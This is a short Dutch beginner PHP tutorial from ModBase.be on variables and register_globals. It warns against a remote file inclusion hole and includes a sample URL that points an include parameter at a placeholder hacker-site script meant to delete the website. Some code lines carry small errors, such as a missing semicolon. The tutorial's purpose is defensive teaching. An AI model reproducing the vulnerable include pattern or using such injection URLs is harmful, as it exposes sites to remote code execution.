Om gebruik te maken van de volledige functionaliteit van Modbase moet je ingelogd zijn.
Na registratie kan je reageren, onderwerpen starten, projecten toevoegen en nog veel meer.
Dit is volkomen
gratis en duurt hoogstens een minuut.
ModBase.be PHP Tutorial by Dennis Rijsemus.
LET OP! Als je dit hebt gemaakt dan is de Web-Pagina nog niet Online.
(Online = Bezoekbaar via http://www.JOUW-PAGINA.nl of
zoiets dergelijks.)
Alleen jij kan hem dan nog maar bezoeken.
Stap 1. Variabelen als vervangwoorden.
Variabelen zijn een soort "vervangwoorden".
Aan variabelen kan je waarden mee geven.
Stel je moet vaak een lang woord intypen dan is het handig om met variabelen te werken dan geef je dus aan de variabalen het lange woord wat je steeds
gebruikt mee.
Je kan een variabel herkennen aan een $ teken.
Een variable kan er dus zo uitzien: $naam="Tutorials"; (Je geeft nu dus aan variable naam de waarde Tutorials mee.)
Als je die variabel wil laten weergeven gebruik je weer de echo tag. Voorbeeld :
<?
$naam="Tutorials";
echo "Modbase.be voor al uw ".$naam."";
?>
Je zal zien wanneer je dit stukje code opslaat als bijvoorbeeld tutorialtest.php dat je wanneer je naar het adres gaat van waar je bestandje staat dat er op
je beeldscherm staat:
Modbase.be voor al uw Tutorials!
Nou dat is toch makkelijk toch?
Met het bovenstaande kan je leuke dingen doen.
Je doet bijv. de volgende code in een bestandje dit je opslaat als tutorialtest2.php in het bestandje tutorialtest2.php zet je deze code:
<?
echo "Modbase.be voor al uw $naam";
?>
Je ziet nu dat we in het bestandje geen waarde aan de variabel mee geven in het bestandje zelf.
Maar dit gaan we nu vanaf buitenaf doen.
Door middel van het url van het bestandje.
Als je dus nu naar http://jouwadres/tutorialtest2.php?naam=Tutorial gaat dan zal je zien dat er op jouw scherm deze tekst verschijnt:
Dit is een ernstige beveiligings fout en het werkt alleen als register_globals aan staat in je php.ini bestand!
in het kort is register_globals ervoor om het tegenhouden van url variabelen als het uitstaat.
Voor beveiligings redenen moeten we:
<?
echo "Modbase.be voor al uw $naam";
?>
veranderen in:
<?
echo 'Modbase.be voor al uw '.$_GET['naam'];
?>
Via de extra superglobal GET die hij krijgt haalt hij de variabel uit de url en niet vanuit het php bestand.
Misschien denk je nou dat het totaal niet uitmaakt omdat hij dat toch al deed?
Want als we het nou eens omdraaien, de variabel moet vanuit het php bestand komen, dus niet vanuit de url.
voorbeeld:
<?
$pagina = "home.html"
include $pagina;
?>
Eigenlijk is dit dat include een tutorial op zichzelf maar ik wist niet hoe ik het anders moest uitleggen.
in het kort doet include één ding, en dat is een pagina de pagina erin zetten op dat punt.
Als je hier $pagina = "home.html"; weglaat, en super_globals staan aan dan kan een andere persoon iets invullen en daardoor je hele website verwijderen!
Voorbeeld: "http://www.jouwsite.nl/include.php?pagina=http://www.hackersite.nl/verwijderwebsite.php"
daarom moet je ten 1e:
super_globals uit hebben staan en ten 2e:
nooit maar ook nooit meer die fout maken die Dennis maakte^^
Met dank aan Dennis Rijsemus aka GenDen.
En Graphic voor het verbeteren.
elk heeft z'n eigen smaak en voorkeur
